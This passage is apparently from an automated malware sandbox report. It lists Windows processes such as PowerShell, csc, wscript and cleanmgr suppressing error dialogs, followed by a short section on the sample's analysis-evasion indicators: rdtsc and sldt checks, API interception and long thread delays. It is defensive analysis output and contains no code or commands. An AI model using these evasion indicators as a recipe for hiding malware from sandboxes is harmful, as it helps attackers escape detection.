                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cleanmgr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cleanmgr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cleanmgr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cleanmgr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cleanmgr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\SysWOW64\cleanmgr.exeAPI/Special instruction interceptor: Address: 7FF90818D324
                    Source: C:\Windows\SysWOW64\cleanmgr.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
                    Source: C:\Windows\SysWOW64\cleanmgr.exeAPI/Special instruction interceptor: Address: 7FF90818D944
                    Source: C:\Windows\SysWOW64\cleanmgr.exeAPI/Special instruction interceptor: Address: 7FF90818D504
                    Source: C:\Windows\SysWOW64\cleanmgr.exeAPI/Special instruction interceptor: Address: 7FF90818D544
                    Source: C:\Windows\SysWOW64\cleanmgr.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
                    Source: C:\Windows\SysWOW64\cleanmgr.exeAPI/Special instruction interceptor: Address: 7FF908190154
                    Source: C:\Windows\SysWOW64\cleanmgr.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0118D1C0 rdtsc 13_2_0118D1C0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04C784CC sldt word ptr [eax]15_2_04C784CC
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4039Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5621Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7810Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1815Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1110Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5016Jump to behavior
